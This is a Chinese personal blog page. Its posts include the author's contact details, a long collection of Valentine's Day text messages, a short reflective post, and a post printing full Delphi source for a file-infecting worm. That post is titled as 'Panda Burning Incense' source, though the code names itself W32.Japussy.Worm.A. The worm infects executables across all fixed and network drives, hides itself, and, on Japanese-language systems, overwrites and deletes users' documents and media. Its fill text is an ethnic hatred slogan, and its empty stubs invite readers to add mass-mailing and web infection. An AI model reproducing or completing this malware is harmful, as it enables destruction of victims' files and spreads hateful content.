豪杰's profile慈悲的爱PhotosBlogListsMore  |  Tools Help |
|
June 26 联系我 一定要很久没来我的这片土地了,现在我开始空虚和寂寞了,只想通过各种方式能够找到每一个人。
留下我的常用联系方式:MSN如主页;
Gtalk jar.bob@gmail.com
QQ 28966930
tel:13951621610 上海号码待续
e-mail:jar.bob@gmail.com
淘宝旺旺:cfan_club
yahoo:bhjie860716@yahoo.com.cn February 15 Your Birthdate
February 14 情人节实用肉麻短信大集合情人节到了,别忘记给暗恋的人发去丘比特的箭,给天天见面的爱人发去平时难以启口的情话,或者给好朋友发去足以让他惦记一个月的匿名情书……
热恋爱人:深情一触即发 ●当你看到这条短信息时,你已经中了猛烈无比的爱毒,唯一的解药就是嫁给我,不用考虑了,咱们结婚吧! ●你的过去我来不及参与,你的未来我不会再错过!真诚之中,与你相识相知;灵犀之间,与你朝夕相伴。
●知道我在做什么吗?给你五个选择:A:想你 B:很想你 C:非常想你 D:不想你不行 E:以上皆是。
●我无法保证、无法向你承诺什么,但我会做到:如果有一天你有饥饿的感觉,那时你定会看到,我已含笑饿死在你的怀抱中。
●爱加爱等于非常的爱,爱减爱等于爱的起点,爱乘爱等于无限的爱,爱除爱等于爱的唯一。或许对于你来说,我的出现只是你生命中的100+1=101。但对于我来说,你的出现在我生命中却是0+1=1的算式。
●如果青蛙没有变成王子 如果公主没有醒来 如果小人鱼没有化作泡沫 我还会相信爱情吗?相信 因为还有你在我的身边。茫茫人海,凭你的名字导航;凄凄寒夜,握你的名字取暖;漫漫人生,携你的名字同游。
●情是心中的向往,是感觉的共鸣,是灵感的碰撞,是电光的闪耀,是甜蜜的琼浆,是醉人的纯酒。祝你情人节快乐!
●看到你,我怕触电;看不到你,我需要充电;如果没有你,我想我会断电。爱你是我的职业,想你是我的事业,抱你是我的特长,吻你是我的专业!
●好想做你的手机,揣在你怀里,捧在你手里,看在你眼里,记在你心里!
●宝贝:最近我牙齿痛,因为常常晚上想你,那感觉太甜蜜了,会蛀牙。
旧情人:调侃中无可奈何花落去
●世间本无沙漠,我每想你一次,上帝就落下一粒沙,从此便有了撒哈拉!这世界本来没有海,只因为我每想你一次,上帝就掉下一滴眼泪,于是就有了太平洋。
●如果爱你是一种错误的话,那我情愿错上加错,哪怕错一辈子!
●长相思,晓月寒,晚风寒,情人佳节独往还,顾影自凄然。见亦难,思亦难,长夜漫漫抱恨眠,问伊怜不怜。
●人生总免不了老去,但我永远会记起与你的美好时光和温情岁月。人生路上祝你拥有灿烂的心情和长长的未来。
●星月不误,因为你已离去;清风不语,因为我在哭泣;我也不语,因为还在想你。
●爱你,却要无欲无求,好难!爱你,却要偷偷摸摸,好累!爱你,却让自己心碎,好惨!但竟然心甘情愿,好傻!
●鱼对水说:你看不见我的眼泪,因为我在水里。水说:我能感觉到你的眼泪,因为你在我心里。
●在错的时间遇上对的人,是一场伤心;在对的时间遇上错的人,是一声叹息;在对的时间遇上对的人,是一生幸福。
正在追求中:送上一颗痴心
●古道西风瘦马,夕阳西下,断肠人在等你电话!
●情人节,我愿做一条鱼,任你红烧、白煮、清蒸,然后躺在你温柔的胃里。
●你来自云南元谋,我来自北京周口,让我牵起你毛绒绒的手!爱情!让我们直立行走!
●爱你不是目的,目的是爱死你!爱你不是目的,目的是爱你一辈子!
●对你的思念太重,压断了电话线,烧坏了手机卡,掏尽了钱包袋,吃光了安眠药,哎!可是我还是思念你。
●你是火车 我是铁路;你是砖瓦 我是泥巴;你是云 我是风;你是巧克力 我是包装纸;你是爱,我是情,有你真精彩。
●我对你的爱如滔滔江水川流不息,又如黄河泛滥一发不可收拾,再如日落西山灿烂辉煌 我想你爱你 我不能没有你,我一定要得到你
●想送你玫瑰可惜价钱太贵,想给你安慰可我还没学会,想给你下跪可戒指还在保险柜,只能发个短信把你追,希望我们永不吹。
●原谅我将你的手机号码告诉了一个陌生人,他叫丘比特,他要帮我告诉你;我心喜欢你,我心在乎你,我心等待你。
●你是毒药,渗入我的血液,穿透我的神经,控制我的大脑,2月14日毒性发作,请别忘了,给我解药!
异性朋友:整蛊你就是喜欢你
●给你点阳光你就灿烂,给你点洪水你就泛滥。破锅自有破锅盖,丑鬼自有丑女爱,只要情深意似海,麻子也能放光彩!
●我爱的人名花有主,爱我的人惨不忍睹,不是在放荡中变坏,就是在沉默中变态。——献给情人节!
●如果你流泪,我愿是你手里的手纸;如果你醒来,我愿是你眼中的眼屎;如果你热死了,我愿是你身上仅剩的布三尺。
●有一种默契叫做心照不宣,有一种感觉叫做妙不可言,有一种幸福叫做有你相伴,有一个白痴会把它看完。
●读它你欠我一个拥抱;删除它欠我一个吻;储存它欠我一个约会;如回复你欠我全部;如不回你就是我的。选择!
●你好像我身上的虱子,没了你 我就混身不自在。
●知道情人节我想吃什么吗?煮你,炒你,清蒸你;烤你,焖你,红烧你;炸你,煎你,凉拌你!
●泥是窝的嘴矮!泥是窝的蒙香!窝深情地看着泥!窝要对泥说,窝矮泥!(请大声朗读)
老夫老妻:柴米油盐的浪漫
●爱你一万年 夸张 爱你五千年 无望 爱你一千年 荒唐 爱你一百年 太长 接连爱你70年 只要我身体健康 这是我的强项
●我的情人节里没有情人,只有我的老婆,她是我的最爱,今天是,明天是,直到我死去我的心中也只有她!真的爱你!
●每一个人的缘分不同,相爱的时间也会有长短,只有尽心尽力的去做,我能够做到的就是:我会让我的爱陪你慢慢的老去。
●有情之人,天天是节。一句寒暖,一线相喧;一句叮咛,一笺相传;一份相思,一心相盼;一份爱意,一生相恋。
●我道出为了我不语,我不语为了我道出;我走开为了我回来,我回来为了我走开。真水本应无香,所以真情才应无语。
●我知道啊!可是我也没办法啊,这段姻缘是上天安排的 就让我们人随天意吧!
●你的照片放在我的办公桌上,清晨看着你,上午看着你,中午看着你,下午看着你,傍晚看着你,晚上看着你。“咕噜咕噜,老婆,什么时候开饭呀?”
●亲爱的老公记住了:如果结婚后老公在情人节不送花给老婆,老婆就在家里的花瓶里插上一把青菜。 预祝大家情人节快乐,情空万里! February 11 熊猫烧香 - 核心源码 (僅供研究使用!後果自行負責)熊猫烧香 - 核心源码
-------------------------------------------------------------------------------- 僅供研究使用!後果自行負責 代码:--------------------------------------------------------------------------------
程序代码 program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; const HeaderSize = 82432; //病毒体的大小 IconOffset = $12EB8; //PE文件主图标的偏移量 //在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同 //查找2800000020的十六进制字符串可以找到主图标的偏移量 { HeaderSize = 38912; //Upx压缩过病毒体的大小 IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量 //Upx 1.24W 用法: upx -9 --8086 Japussy.exe } IconSize = $2E8; //PE文件主图标的大小--744字节 IconTail = IconOffset + IconSize; //PE文件主图标的尾部 ID = $44444444; //感染标记 //垃圾码,以备写入 Catchword = 'If a race need to be killed out, it must be Yamato. ' + 'If a country need to be destroyed, it must be Japan! ' + '*** W32.Japussy.Worm.A ***'; {$R *.RES} function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'Kernel32.dll'; //函数声明 var TmpFile: string; Si: STARTUPINFO; Pi: PROCESS_INFORMATION; IsJap: Boolean = False; //日文操作系统标记 { 判断是否为Win9x } function IsWin9x: Boolean; var Ver: TOSVersionInfo; begin Result := False; Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); if not GetVersionEx(Ver) then Exit; if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x Result := True; end; { 在流之间复制 } procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer); var sCurPos, dCurPos: Integer; begin sCurPos := Src.Position; dCurPos := Dst.Position; Src.Seek(sStartPos, 0); Dst.Seek(dStartPos, 0); Dst.CopyFrom(Src, Count); Src.Seek(sCurPos, 0); Dst.Seek(dCurPos, 0); end; { 将宿主文件从已感染的PE文件中分离出来,以备使用 } procedure ExtractFile(FileName: string); var sStream, dStream: TFileStream; begin try sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); try dStream := TFileStream.Create(FileName, fmCreate); try sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分 dStream.CopyFrom(sStream, sStream.Size - HeaderSize); finally dStream.Free; end; finally sStream.Free; end; except end; end; { 填充STARTUPINFO结构 } procedure FillStartupInfo(var Si: STARTUPINFO; State: Word); begin Si.cb := SizeOf(Si); Si.lpReserved := nil; Si.lpDesktop := nil; Si.lpTitle := nil; Si.dwFlags := STARTF_USESHOWWINDOW; Si.wShowWindow := State; Si.cbReserved2 := 0; Si.lpReserved2 := nil; end; { 发带毒邮件 } procedure SendMail; begin //哪位仁兄愿意完成之? end; { 感染PE文件 } procedure InfectOneFile(FileName: string); var HdrStream, SrcStream: TFileStream; IcoStream, DstStream: TMemoryStream; iID: LongInt; aIcon: TIcon; Infected, IsPE: Boolean; i: Integer; Buf: array[0..1] of Char; begin try //出错则文件正在被使用,退出 if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染 Exit; Infected := False; IsPE := False; SrcStream := TFileStream.Create(FileName, fmOpenRead); try for i := 0 to $108 do //检查PE文件头 begin SrcStream.Seek(i, soFromBeginning); SrcStream.Read(Buf, 2); if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记 begin IsPE := True; //是PE文件 Break; end; end; SrcStream.Seek(-4, soFromEnd); //检查感染标记 SrcStream.Read(iID, 4); if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染 Infected := True; finally SrcStream.Free; end; if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出 Exit; IcoStream := TMemoryStream.Create; DstStream := TMemoryStream.Create; try aIcon := TIcon.Create; try //得到被感染文件的主图标(744字节),存入流 aIcon.ReleaseHandle; aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0); aIcon.SaveToStream(IcoStream); finally aIcon.Free; end; SrcStream := TFileStream.Create(FileName, fmOpenRead); //头文件 HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); try //写入病毒体主图标之前的数据 CopyStream(HdrStream, 0, DstStream, 0, IconOffset); //写入目前程序的主图标 CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize); //写入病毒体主图标到病毒体尾部之间的数据 CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail); //写入宿主程序 CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size); //写入已感染的标记 DstStream.Seek(0, 2); iID := $44444444; DstStream.Write(iID, 4); finally HdrStream.Free; end; finally SrcStream.Free; IcoStream.Free; DstStream.SaveToFile(FileName); //替换宿主文件 DstStream.Free; end; except; end; end; { 将目标文件写入垃圾码后删除 } procedure SmashFile(FileName: string); var FileHandle: Integer; i, Size, Mass, Max, Len: Integer; begin try SetFileAttributes(PChar(FileName), 0); //去掉只读属性 FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件 try Size := GetFileSize(FileHandle, nil); //文件大小 i := 0; Randomize; Max := Random(15); //写入垃圾码的随机次数 if Max < 5 then Max := 5; Mass := Size div Max; //每个间隔块的大小 Len := Length(Catchword); while i < Max do begin FileSeek(FileHandle, i * Mass, 0); //定位 //写入垃圾码,将文件彻底破坏掉 FileWrite(FileHandle, Catchword, Len); Inc(i); end; finally FileClose(FileHandle); //关闭文件 end; DeleteFile(PChar(FileName)); //删除之 except end; end; { 获得可写的驱动器列表 } function GetDrives: string; var DiskType: Word; D: Char; Str: string; i: Integer; begin for i := 0 to 25 do //遍历26个字母 begin D := Chr(i + 65); Str := D + ':'; DiskType := GetDriveType(PChar(Str)); //得到本地磁盘和网络盘 if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then Result := Result + D; end; end; { 遍历目录,感染和摧毁文件 } procedure LoopFiles(Path, Mask: string); var i, Count: Integer; Fn, Ext: string; SubDir: TStrings; SearchRec: TSearchRec; Msg: TMsg; function IsValidDir(SearchRec: TSearchRec): Integer; begin if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and (SearchRec.Name <> '..') then Result := 0 //不是目录 else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and (SearchRec.Name <> '..') then Result := 1 //不是根目录 else Result := 2; //是根目录 end; begin if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then begin repeat PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑 if IsValidDir(SearchRec) = 0 then begin Fn := Path + SearchRec.Name; Ext := UpperCase(ExtractFileExt(Fn)); if (Ext = '.EXE') or (Ext = '.SCR') then begin InfectOneFile(Fn); //感染可执行文件 end else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then begin //感染HTML和ASP文件,将Base64编码后的病毒写入 //感染浏览此网页的所有用户 //哪位大兄弟愿意完成之? end else if Ext = '.WAB' then //Outlook地址簿文件 begin //获取Outlook邮件地址 end else if Ext = '.ADC' then //Foxmail地址自动完成文件 begin //获取Foxmail邮件地址 end else if Ext = 'IND' then //Foxmail地址簿文件 begin //获取Foxmail邮件地址 end else begin if IsJap then //是倭文操作系统 begin if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or (Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or (Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or (Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or (Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or (Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then SmashFile(Fn); //摧毁文件 end; end; end; //感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑 Sleep(200); until (FindNext(SearchRec) <> 0); end; FindClose(SearchRec); SubDir := TStringList.Create; if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then begin repeat if IsValidDir(SearchRec) = 1 then SubDir.Add(SearchRec.Name); until (FindNext(SearchRec) <> 0); end; FindClose(SearchRec); Count := SubDir.Count - 1; for i := 0 to Count do LoopFiles(Path + SubDir.Strings[i] + '', Mask); FreeAndNil(SubDir); end; { 遍历磁盘上所有的文件 } procedure InfectFiles; var
DriverList: string; i, Len: Integer; begin if GetACP = 932 then //日文操作系统 IsJap := True; //去死吧! DriverList := GetDrives; //得到可写的磁盘列表 Len := Length(DriverList); while True do //死循环 begin for i := Len downto 1 do //遍历每个磁盘驱动器 LoopFiles(DriverList[i] + ':', '*.*'); //感染之 SendMail; //发带毒邮件 Sleep(1000 * 60 * 5); //睡眠5分钟 end; end; { 主程序开始 } begin if IsWin9x then //是Win9x RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程 else //WinNT begin //远程线程映射到Explorer进程 //哪位兄台愿意完成之? end; //如果是原始病毒体自己 if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then InfectFiles //感染和发邮件 else //已寄生于宿主程序上了,开始工作 begin TmpFile := ParamStr(0); //创建临时文件 Delete(TmpFile, Length(TmpFile) - 4, 4); TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格 ExtractFile(TmpFile); //分离之 FillStartupInfo(Si, SW_SHOWDEFAULT); CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, 0, nil, '.', Si, Pi); //创建新进程运行之 InfectFiles; //感染和发邮件 end; end. ~~~~~~~~~~~~~~~~~~~~~~~~
完毕! February 09 想忘的人放弃的时候义无返顾,放弃过后有遗憾却不后悔。哪怕再选择一次,还是会放弃。我们即使充满了无奈和抱歉,但已经无法回头。因为我们早已决定了自己的方向,不会为了某个人还改变自己的未来。所以我们只能对他说抱歉了。 慈悲的爱眼泪的存在只是证明我的爱是一种慈悲! |
|
||||||||||
|
|
